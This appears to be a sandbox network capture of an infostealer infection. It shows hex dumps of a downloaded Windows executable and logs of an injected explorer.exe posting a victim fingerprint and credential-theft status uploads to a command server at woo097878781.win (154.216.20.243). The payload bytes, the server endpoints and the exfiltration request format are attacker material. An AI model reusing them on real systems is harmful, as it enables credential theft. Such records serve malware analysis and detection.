                                                                          Last-Modified: Mon, 18 Nov 2024 12:28:55 GMT
                                                                          Connection: close
                                                                          ETag: "673b3307-f9800"
                                                                          X-Powered-By: PleskLin
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 14:07:32 UTC16110INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 48 87 75 ed 29 e9 26 ed 29 e9 26 ed 29 e9 26 f6 b4 77 26 e7 29 e9 26 e4 51 6e 26 ec 29 e9 26 e4 51 7a 26 fc 29 e9 26 ed 29 e8 26 4f 29 e9 26 f6 b4 42 26 d9 29 e9 26 f6 b4 43 26 90 29 e9 26 f6 b4 74 26 ec 29 e9 26 52 69 63 68 ed 29 e9 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 ea e3 36 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 46 0d
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Hu)&)&)&w&)&Qn&)&Qz&)&)&O)&B&)&C&)&t&)&Rich)&PEd6g"F
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 24 60 ff 15 ba 16 0d 00 8b 44 24 68 39 44 24 48 0f 85 8d 01 00 00 48 c7 44 24 78 00 00 00 00 48 8d 15 8c 26 0d 00 48 8b 4c 24 70 e8 92 6b 00 00 48 89 44 24 78 48 83 7c 24 78 00 0f 84 62 01 00 00 48 8d 15 7a 26 0d 00 48 8b 4c 24 78 e8 70 6b 00 00 48 89 84 24 80 00 00 00 48 83 bc 24 80 00 00 00 00 0f 84 3a 01 00 00 48 8b 84 24 80 00 00 00 48 83 c0 11 48 89 84 24 80 00 00 00 c7 84 24 88 00 00 00 00 00 00 00 48 63 84 24 88 00 00 00 48 8b 8c 24 80 00 00 00 0f be 04 01 83 f8 22 74 12 8b 84 24 88 00 00 00 ff c0 89 84 24 88 00 00 00 eb d5 4c 8d 84 24 98 00 00 00 8b 94 24 88 00 00 00 48 8b 8c 24 80 00 00 00 e8 c3 ab 0b 00 48 89 84 24 90 00 00 00 48 83 bc 24 90 00 00 00 00 0f 84 bd 00 00 00 48 8b 84 24 90 00 00 00 48 83 c0 05 48 89 84 24 b0 00 00 00 8b 84 24 98 00
                                                                          Data Ascii: $`D$h9D$HHD$xH&HL$pkHD$xH|$xbHz&HL$xpkH$H$:H$HH$$Hc$H$"t$$L$$H$H$H$H$HH$$
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 00 00 00 48 8d 8c 24 b8 00 00 00 e8 92 2d 00 00 8b 8c 24 38 01 00 00 48 63 94 24 f4 00 00 00 4c 8b 84 24 30 01 00 00 49 8d 14 50 48 89 94 24 10 01 00 00 4c 8b c8 4c 8d 05 45 f6 0c 00 8b d1 48 8b 84 24 10 01 00 00 48 8b c8 e8 43 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 8b 84 24 38 01 00 00 48 63 8c 24 f4 00 00 00 48 8b 94 24 30 01 00 00 48 8d 0c 4a 4c 8d 05 1b f6 0c 00 8b d0 e8 08 9d 0b 00 8b 8c 24 f4 00 00 00 03 c8 8b c1 89 84 24 f4 00 00 00 48 8d 8c 24 b8 00 00 00 e8 e9 2b 00 00 90 48 8d 8c 24 90 00 00 00 e8 db 2b 00 00 90 48 8d 4c 24 30 e8 d0 2b 00 00 90 48 8d 4c 24 60 e8 c5 2b 00 00 48 8b 8c 24 18 01 00 00 48 33 cc e8 b5 9e 0b 00 48 81 c4 28 01 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 48 89 54 24 10 48 89 4c
                                                                          Data Ascii: H$-$8Hc$L$0IPH$LLEH$HC$$$8Hc$H$0HJL$$H$+H$+HL$0+HL$`+H$H3H(LD$HT$HL
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 84 24 30 01 00 00 ff c0 89 84 24 30 01 00 00 48 63 84 24 30 01 00 00 48 83 f8 6a 0f 83 e6 00 00 00 83 bc 24 f0 0a 00 00 00 74 7a 48 63 84 24 30 01 00 00 48 8d 0d a8 b5 0d 00 4c 8d 8c 24 40 01 00 00 41 b8 08 00 00 00 8b 94 24 f0 0a 00 00 48 8b 0c c1 e8 da fc ff ff 48 8d 94 24 40 01 00 00 48 8b 4c 24 30 ff 15 f7 94 0c 00 48 89 84 24 c0 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 90 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c0 09 00 00 48 89 08 48 83 bc 24 c0 09 00 00 00 75 07 33 c0 e9 ff 13 00 00 eb 5d 48 63 84 24 30 01 00 00 48 8d 0d 2e b5 0d 00 48 8b 04 c1 48 83 c0 08 48 8b d0 48 8b 4c 24 30 ff 15 98 94 0c 00 48 89 84 24 c8 09 00 00 48 63 84 24 30 01 00 00 48 8d 0d 31 c6 0d 00 48 8b 04 c1 48 8b 8c 24 c8 09 00 00 48 89 08 48 83 bc 24 c8 09 00 00 00 75 07 33 c0 e9 a0
                                                                          Data Ascii: $0$0Hc$0Hj$tzHc$0HL$@A$HH$@HL$0H$Hc$0HHH$HH$u3]Hc$0H.HHHHL$0H$Hc$0H1HH$HH$u3
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 1c 8b 44 24 14 99 83 e2 03 03 c2 c1 f8 02 8b 4c 24 1c 2b c8 8b c1 89 44 24 14 8b 44 24 14 05 f4 05 00 00 89 44 24 08 66 0f 6e 44 24 08 f3 0f e6 c0 f2 0f 5c 05 a1 eb 0c 00 f2 0f 5e 05 91 eb 0c 00 f2 0f 2c c0 89 44 24 0c 8b 44 24 0c 25 ff 7f 00 00 69 c0 ad 8e 00 00 99 b9 64 00 00 00 f7 f9 89 44 24 18 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 66 0f 6e c0 f3 0f e6 c0 f2 0f 5e 05 4a eb 0c 00 f2 0f 2c c0 89 04 24 66 0f 6e 04 24 f3 0f e6 c0 f2 0f 10 0d 32 eb 0c 00 f2 0f 59 c8 66 0f 28 c1 f2 0f 2c c0 89 44 24 10 8b 44 24 18 8b 4c 24 08 2b c8 8b c1 2b 44 24 10 48 8b 4c 24 40 89 41 10 83 3c 24 0e 7d 0b 8b 04 24 ff c8 89 44 24 20 eb 0a 8b 04 24 83 e8 0d 89 44 24 20 48 8b 44 24 40 8b 4c 24 20 89 48 0c 48 8b 44 24 40 83 78 0c 02 7e 0f 8b 44 24 0c 2d 6c 12 00 00 89 44 24 24
                                                                          Data Ascii: D$L$+D$D$D$fnD$\^,D$D$%idD$D$L$+fn^J,$fn$2Yf(,D$D$L$++D$HL$@A<$}$D$ $D$ HD$@L$ HHD$@x~D$-lD$$
                                                                          2024-12-08 14:07:32 UTC16384INData Raw: 75 0a 48 8b 44 24 38 48 89 44 24 20 83 bc 24 0c 01 00 00 00 7c 37 c7 44 24 34 00 00 00 00 eb 0a 8b 44 24 34 ff c0 89 44 24 34 8b 84 24 0c 01 00 00 39 44 24 34 7d 14 48 63 44 24 34 48 8b 4c 24 38 0f be 04 01 85 c0 74 02 eb d5 eb 0e 48 8b 4c 24 38 e8 0b 15 00 00 89 44 24 34 e9 fb 04 00 00 0f b6 84 24 08 01 00 00 83 f8 0e 75 0d c7 84 24 f4 01 00 00 22 00 00 00 eb 0b c7 84 24 f4 01 00 00 27 00 00 00 0f b6 84 24 f4 01 00 00 88 84 24 70 01 00 00 0f b6 84 24 e0 00 00 00 85 c0 74 17 48 8b 8c 24 f0 00 00 00 e8 85 07 00 00 48 89 84 24 68 01 00 00 eb 28 48 8b 84 24 40 02 00 00 48 83 c0 08 48 89 84 24 40 02 00 00 48 8b 84 24 40 02 00 00 48 8b 40 f8 48 89 84 24 68 01 00 00 48 83 bc 24 68 01 00 00 00 75 0d c7 84 24 f8 01 00 00 01 00 00 00 eb 0b c7 84 24 f8 01 00 00 00
                                                                          Data Ascii: uHD$8HD$ $|7D$4D$4D$4$9D$4}HcD$4HL$8tHL$8D$4$u$"$'$$p$tH$H$h(H$@HH$@H$@H@H$hH$hu$$
                                                                          2024-12-08 14:07:33 UTC16384INData Raw: 00 00 48 8b 4c 24 38 4c 8b 49 30 4c 8d 05 b8 28 0d 00 8b d0 b9 0a 08 00 00 e8 14 ec ff ff 89 44 24 30 83 7c 24 40 02 7c 29 8b 05 3b 0c 0d 00 ff c0 48 8b 4c 24 38 48 83 c1 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b d0 e8 c0 fb ff ff 83 7c 24 68 00 75 11 83 7c 24 40 01 7c 0a 48 8b 4c 24 38 e8 48 fd ff ff 83 7c 24 40 03 7c 28 48 8b 44 24 38 48 83 c0 10 c7 44 24 20 00 00 00 00 41 b9 01 00 00 00 45 33 c0 8b 15 d9 0b 0d 00 48 8b c8 e8 79 fb ff ff 48 8b 44 24 38 0f b6 4c 24 68 88 48 18 8b 44 24 30 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                          Data Ascii: HL$8LI0L(D$0|$@|);HL$8HD$ AE3|$hu|$@|HL$8H|$@|(HD$8HD$ AE3HyHD$8L$hHD$0HXT$HL$3HT$HL$3
                                                                          2024-12-08 14:07:33 UTC16384INData Raw: 48 8b 44 24 60 48 63 40 08 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 38 48 8b 44 24 38 48 8b 4c 24 20 48 89 08 48 8b 44 24 38 48 83 c0 38 48 8b 4c 24 38 48 89 41 08 48 8b 44 24 38 c6 40 15 01 48 8b 44 24 38 c6 40 16 00 48 8b 44 24 38 48 8b 4c 24 60 48 8b 49 40 48 89 48 18 48 8b 44 24 60 48 8b 4c 24 38 48 89 48 40 48 8b 44 24 60 48 63 40 10 48 8b 4c 24 20 48 03 c8 48 8b c1 48 89 44 24 20 e9 60 ff ff ff 48 8b 44 24 60 48 83 78 40 00 74 0a c7 44 24 48 01 00 00 00 eb 08 c7 44 24 48 00 00 00 00 8b 44 24 48 48 83 c4 58 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 38 48 c7 44 24 20 00 00 00 00 8b 05 25 8d 0d 00 39 44 24 40 0f 8f 92 00 00 00 48 8b 0d 30 8d 0d 00 e8 83 56 ff ff 48 8b 05 2c 8d 0d 00 48 89 44 24 20 48 83 7c 24
                                                                          Data Ascii: HD$`Hc@HL$ HHHD$8HD$8HL$ HHD$8H8HL$8HAHD$8@HD$8@HD$8HL$`HI@HHHD$`HL$8HH@HD$`Hc@HL$ HHHD$ `HD$`Hx@tD$HD$HD$HHXL$H8HD$ %9D$@H0VH,HD$ H|$
                                                                          2024-12-08 14:07:33 UTC16384INData Raw: d2 8b 44 24 28 b9 08 00 00 00 f7 f1 8b c0 48 8b 4c 24 20 0f b6 44 01 10 8b 4c 24 28 83 e1 07 ba 01 00 00 00 d3 e2 8b ca 23 c1 85 c0 74 0a c7 44 24 08 01 00 00 00 eb 08 c7 44 24 08 00 00 00 00 8b 44 24 08 eb 68 eb 66 8b 44 24 28 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 8b 44 24 28 ff c0 89 44 24 28 8b 44 24 04 48 8b 4c 24 20 83 7c 81 10 00 74 35 8b 44 24 04 48 8b 4c 24 20 8b 54 24 28 39 54 81 10 75 07 b8 01 00 00 00 eb 1d 8b 44 24 04 ff c0 8b c0 33 d2 b9 7c 00 00 00 48 f7 f1 48 8b c2 89 44 24 04 eb bb 33 c0 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 58 c7 44 24 20 00 00 00 00 48 8b 44 24 60 48 8b 40 20 48 89 44 24 28 48 8b 44 24 28 0f b6 40 09 83 f8 02 0f 84 a9 00 00 00 48 8b 4c 24 28 e8 75 01 00 00 89 44
                                                                          Data Ascii: D$(HL$ DL$(#tD$D$D$hfD$(3|HHD$D$(D$(D$HL$ |t5D$HL$ T$(9TuD$3|HHD$3HHL$HXD$ HD$`H@ HD$(HD$(@HL$(uD
                                                                          2024-12-08 14:07:33 UTC16384INData Raw: 10 48 8b 4c 24 28 48 8b 44 24 30 ff 90 00 01 00 00 48 8b 4c 24 28 e8 37 bc ff ff 48 8b 44 24 30 48 8b 48 70 e8 f9 a2 00 00 8b 44 24 20 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f bf 40 2e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8b 40 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 0f b6 40 09 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 8b 4c 24 30 e8 7d 06 00 00 48 8b 44 24 30 0f bf 40 3c 85 c0 7c 26 48 8b 44 24 30 0f bf 40 3c 83 c0 03 8b d0 48 8b 4c 24 30 e8 28 00 00 00 b8 ff ff ff ff
                                                                          Data Ascii: HL$(HD$0HL$(7HD$0HHpD$ HHHL$HD$@.HL$HD$H@HHL$HD$H@HL$HD$@HL$H(HL$0}HD$0@<|&HD$0@<HL$0(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49774 | 154.216.20.243 | 443 | 6196 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-08 14:07:37 UTC | 179 | OUT | POST /66/api/endpoint.php HTTP/1.1
                                                                          Accept: */*
                                                                          Connection: close
                                                                          Content-Length: 307
                                                                          Content-Type: application/json
                                                                          Host: woo097878781.win
                                                                          User-Agent: cpp-httplib/0.12.6
                                                                          2024-12-08 14:07:37 UTC307OUTData Raw: 7b 22 69 64 22 3a 22 6f 6d 73 69 68 6c 6f 79 77 66 61 6c 79 72 6f 62 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 36 34 38 33 35 31 22 2c 22 67 70 75 22 3a 22 4d 36 36 39 4c 41 38 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a 5c 5c 57 69 6e 64 6f 77 73 5c 5c 65 78 70 6c 6f 72 65 72 2e 65 78 65 20 2d 20 50 72 6f
                                                                          Data Ascii: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Pro
2024-12-08 14:07:37 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:07:37 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          X-Robots-Tag: noindex, nofollow
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
2024-12-08 14:07:37 UTC | 28 | IN | Data Raw: 31 31 0d 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 11{"response":"ok"}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49775 | 154.216.20.243 | 443 | 6864 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-08 14:07:46 UTC | 234 | OUT | POST /upload.php HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=part
                                                                          Host: woo097878781.win
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Content-Length: 419
                                                                          2024-12-08 14:07:46 UTC403OUTData Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 37 39 35 33 65 34 63 37 39 62 38 62 64 65 61 32 32 64 36 31 66 37 33 36 65 36 31 64 34 33 63 62 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d
                                                                          Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_7953e4c79b8bdea22d61f736e61d43cb--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
2024-12-08 14:07:46 UTC | 6 | OUT | Data Raw: 0d 00 0a 00 00 00
                                                                          Data Ascii:
2024-12-08 14:07:46 UTC | 10 | OUT | Data Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d
                                                                          Data Ascii: --part--
2024-12-08 14:07:47 UTC | 231 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:07:46 GMT
                                                                          Content-Type: text/plain;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
2024-12-08 14:07:47 UTC | 11 | IN | Data Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 110


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49804 | 154.216.20.243 | 443 | 6864 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-08 14:07:54 UTC | 234 | OUT | POST /upload.php HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=part
                                                                          Host: woo097878781.win
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Content-Length: 414
                                                                          2024-12-08 14:07:54 UTC | 402 | OUT | Data Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 37 39 35 33 65 34 63 37 39 62 38 62 64 65 61 32 32 64 36 31 66 37 33 36 65 36 31 64 34 33 63 62 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d
                                                                          Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_7953e4c79b8bdea22d61f736e61d43cb--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
                                                                          2024-12-08 14:07:54 UTC | 2 | OUT | Data Raw: 00 00
                                                                          Data Ascii:
                                                                          2024-12-08 14:07:54 UTC | 10 | OUT | Data Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d
                                                                          Data Ascii: --part--
                                                                          2024-12-08 14:07:54 UTC | 231 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:07:54 GMT
                                                                          Content-Type: text/plain;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:07:54 UTC | 11 | IN | Data Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 110


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          5 | 192.168.2.6 | 49823 | 154.216.20.243 | 443 | 6864 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-12-08 14:08:11 UTC | 234 | OUT | POST /upload.php HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=part
                                                                          Host: woo097878781.win
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Content-Length: 538
                                                                          2024-12-08 14:08:11 UTC | 404 | OUT | Data Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 37 39 35 33 65 34 63 37 39 62 38 62 64 65 61 32 32 64 36 31 66 37 33 36 65 36 31 64 34 33 63 62 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d
                                                                          Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_7953e4c79b8bdea22d61f736e61d43cb--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
                                                                          2024-12-08 14:08:11 UTC | 124 | OUT | Data Raw: 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 20 00 76 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 73 00 75 00 70 00 70 00 6f 00 72 00 74 00 73 00 20 00 46 00 6f 00 78 00 4d 00 61 00 69 00 6c 00 20 00 37 00 2e 00 32 00 20 00 77 00 68 00 69 00 63 00 68 00 20 00 77 00 61 00 73 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 75 00 6e 00 64 00 2e 00 0d 00 0a 00 0d 00 0a 00 00 00
                                                                          Data Ascii: Current version supports FoxMail 7.2 which was not found.
                                                                          2024-12-08 14:08:11 UTC | 10 | OUT | Data Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d
                                                                          Data Ascii: --part--
                                                                          2024-12-08 14:08:11 UTC | 231 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:08:11 GMT
                                                                          Content-Type: text/plain;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:08:11 UTC | 11 | IN | Data Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 110


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          6 | 192.168.2.6 | 49857 | 154.216.20.243 | 443 | 6864 | C:\Windows\explorer.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-12-08 14:08:14 UTC | 234 | OUT | POST /upload.php HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=part
                                                                          Host: woo097878781.win
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                          Content-Length: 533
                                                                          2024-12-08 14:08:14 UTC | 415 | OUT | Data Raw: 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 48 57 49 44 5f 37 39 35 33 65 34 63 37 39 62 38 62 64 65 61 32 32 64 36 31 66 37 33 36 65 36 31 64 34 33 63 62 0d 0a 2d 2d 70 61 72 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 6f 67 66 6f 6c 64 65 72 6e 61 6d 65 22 0d 0a 0d 0a 36 36 0d 0a 2d 2d 70 61 72 74 0d
                                                                          Data Ascii: --partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="hwid"HWID_7953e4c79b8bdea22d61f736e61d43cb--partContent-Type: text/plain; charset="UTF-8"Content-Disposition: form-data; name="logfoldername"66--part
                                                                          2024-12-08 14:08:14 UTC | 108 | OUT | Data Raw: 54 00 68 00 75 00 6e 00 64 00 65 00 72 00 42 00 69 00 72 00 64 00 20 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 52 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 20 00 49 00 73 00 20 00 54 00 65 00 6d 00 70 00 6f 00 72 00 61 00 72 00 69 00 6c 00 79 00 20 00 44 00 69 00 73 00 61 00 62 00 6c 00 65 00 64 00 00 00
                                                                          Data Ascii: ThunderBird Password Recovery Is Temporarily Disabled
                                                                          2024-12-08 14:08:14 UTC | 10 | OUT | Data Raw: 0d 0a 2d 2d 70 61 72 74 2d 2d
                                                                          Data Ascii: --part--
                                                                          2024-12-08 14:08:14 UTC | 231 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Sun, 08 Dec 2024 14:08:14 GMT
                                                                          Content-Type: text/plain;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.3.14
                                                                          Vary: Accept-Encoding
                                                                          X-Powered-By: PleskLin
                                                                          2024-12-08 14:08:14 UTC | 11 | IN | Data Raw: 31 0d 0a 31 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 110


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
